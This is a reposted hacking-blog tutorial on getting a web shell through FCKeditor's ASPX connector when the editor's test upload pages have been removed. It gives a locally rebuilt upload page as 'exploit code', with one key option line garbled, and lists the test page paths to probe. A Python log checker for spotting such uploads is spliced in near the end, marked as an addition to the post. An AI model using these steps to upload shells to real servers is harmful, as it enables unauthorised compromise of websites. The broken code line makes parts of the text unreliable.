FCKeditor secondary upload when no test upload page is present
Published: 2019-06-25



This article is original to or reposted by EnjoyHack. When reposting, please credit the source; for the detailed source, see:

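Getting a shell through FCKeditor secondary upload is one of the classic entries in the set of FCKeditor vulnerabilities. The preconditions are that the server supports ASPX and that the file FckEditor/editor/filemanager/connectors/aspx/connector.aspx has not been deleted. For ASPX sites the secondary-upload vulnerability is fairly convenient to exploit and has a fairly high success rate; for an ASP site it also works, as long as ASPX is supported and the file has not been deleted.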

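When exploiting secondary upload, we usually look for one of the test upload pages shipped with FckEditor and upload through it. Sometimes, however, every test upload page has been deleted; I have run into this many times. In that case we can build the upload page locally and then submit it, provided we have confirmed that FckEditor/editor/filemanager/connectors/aspx/connector.aspx exists and that the server parses ASPX.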

Exploit code:

<!--

* FCKeditor - The text editor for Internet - 

* Copyright (C) 2003-2007 Frederico Caldeira Knabben

*

* == BEGIN LICENSE ==

*

* Licensed under the terms of any of the following licenses at your

* choice:

*

* - GNU General Public License Version 2 or later (the "GPL")


*

* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")


*

* - Mozilla Public License Version 1.1 or later (the "MPL")


*

* == END LICENSE ==

*

* Test page for the File Browser connectors.

-->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>FCKeditor - Connectors Tests</title>

<script type="text/javascript">

function BuildBaseUrl( command )

{

var sUrl =

document.getElementById('cmbConnector').value +

'?Command=' + command +

'&Type=' + document.getElementById('cmbType').value +

'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;

return sUrl ;

}

function SetFrameUrl( url )

{

document.getElementById('eRunningFrame').src = url ;

document.getElementById('eUrl').innerHTML = url ;

}

function GetFolders()

{

SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;

return false ;

}

function GetFoldersAndFiles()

{

SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;

return false ;

}

function CreateFolder()

{

var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

if ( ! sFolder )

return false ;

var sUrl = BuildBaseUrl( 'CreateFolder' ) ;

sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;

SetFrameUrl( sUrl ) ;

return false ;

}

function OnUploadCompleted( errorNumber, fileName )

{

switch ( errorNumber )

{

case 0 :

alert( 'File uploaded with no errors' ) ;

break ;

case 201 :

GetFoldersAndFiles() ;

alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;

break ;

case 202 :

alert( 'Invalid file' ) ;

break ;

default :

alert( 'Error on file upload. Error number: ' + errorNumber ) ;

break ;

}

}

this.frames.frmUpload = this ;

function SetAction()

{

var sUrl = BuildBaseUrl( 'FileUpload' ) ;

document.getElementById('eUrl').innerHTML = sUrl ;

document.getElementById('frmUpload').action = sUrl ;

}

</script>

</head>

<body>

<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">

<tr>

<td>

<table cellspacing="0" cellpadding="0" border="0">

<tr>

<td>

Connector:<br />

<select id="cmbConnector" name="cmbConnector">

<option value="asp/connector.asp" selected="selected">ASP</option>

<option value="
>

<option value="cfm/connector.cfm">ColdFusion</option>

<option value="lasso/connector.lasso">Lasso</option>

<option value="perl/connector.cgi">Perl</option>

<option value="php/connector.php">PHP</option>

<option value="py/connector.py">Python</option>

</select>

</td>

<td>

</td>

<td>

Current Folder<br />

<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>

<td>

</td>

<td>

Resource Type<br />

<select id="cmbType" name="cmbType">

<option value="File" selected="selected">File</option>

<option value="Image">Image</option>

<option value="Flash">Flash</option>

<option value="Media">Media</option>

<option value="Invalid">Invalid Type (for testing)</option>

</select>

</td>

</tr>

</table>

<br />

<table cellspacing="0" cellpadding="0" border="0">

<tr>

<td valign="top">

<a href="#" onclick="GetFolders();">Get Folders</a></td>

<td>

</td>

<td valign="top">

<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>

<td>

</td>

<td valign="top">

<a href="#" onclick="CreateFolder();">Create Folder</a></td>

<td>

</td>

<td valign="top">

<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">

File Upload<br />

<input id="txtFileUpload" type="file" name="NewFile" />

<input type="submit" value="Upload" />

</form>

</td>

</tr>

</table>

<br />

URL: <span id="eUrl"></span>

</td>

</tr>

<tr>

<td height="100%" valign="top">

<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"

height="100%"></iframe>

</td>

</tr>

</table>

</body>

</html>

<option value="
>is the ASPX upload execution path; the same applies to ASP and PHP, so add those yourself as needed!!

Upload addresses of the test files in FCKeditor

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html 
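
A defender-side check for the request pattern described above, as an added example that is not part of the original post: it reads IIS W3C extended log lines and flags FileUpload POSTs to an FCKeditor connector that carry no same-site Referer (as happens when the form is submitted from a locally built page), plus test pages that are still being served. The log lines, host name and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths named in the article, matched case-insensitively under any install prefix.
CONNECTOR = re.compile(
    r"/editor/filemanager/(?:browser/default/)?connectors/\w+/connector\.\w+$", re.I)
TEST_PAGE = re.compile(
    r"/editor/filemanager/(?:browser/default/connectors|upload|connectors)"
    r"/(?:upload)?test\.html$", re.I)

# Constructed sample in IIS W3C extended format (documentation IPs, made-up host).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Referer) sc-status
2019-06-25 10:00:01 GET /FCKeditor/editor/filemanager/connectors/test.html - 203.0.113.7 - 404
2019-06-25 10:00:05 POST /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx Command=FileUpload&Type=File&CurrentFolder=%2F 203.0.113.7 - 200
2019-06-25 10:02:00 POST /FCKeditor/editor/filemanager/connectors/aspx/connector.aspx Command=FileUpload&Type=Image&CurrentFolder=%2F 198.51.100.4 http://www.example.test/admin/edit.aspx 200
2019-06-25 10:03:00 GET /FCKeditor/editor/filemanager/upload/test.html - 198.51.100.9 - 200
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive as column names."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def findings(lines, site_host):
    """Return (client_ip, reason, uri_stem) tuples worth a closer look."""
    out = []
    for r in parse_w3c(lines):
        stem = r.get("cs-uri-stem", "")
        command = parse_qs(r.get("cs-uri-query", "")).get("Command", [""])[0]
        referer = r.get("cs(Referer)", "-")
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        if TEST_PAGE.search(stem) and r.get("sc-status") == "200":
            out.append((r["c-ip"], "test page still served", stem))
        elif (CONNECTOR.search(stem) and r.get("cs-method") == "POST"
              and command == "FileUpload" and ref_host != site_host):
            out.append((r["c-ip"], "FileUpload POST without same-site Referer", stem))
    return out


if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG, "www.example.test"):
        print(hit)
```

The Referer header is client-supplied, so a hit is a triage signal rather than proof; removing unused connectors and test pages is what closes the path.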

 

This article is reposted from hackfreer's 51CTO blog. Original link: http://blog.51cto.com/pnig0s1992/458345. To repost it, please contact the original author yourself.
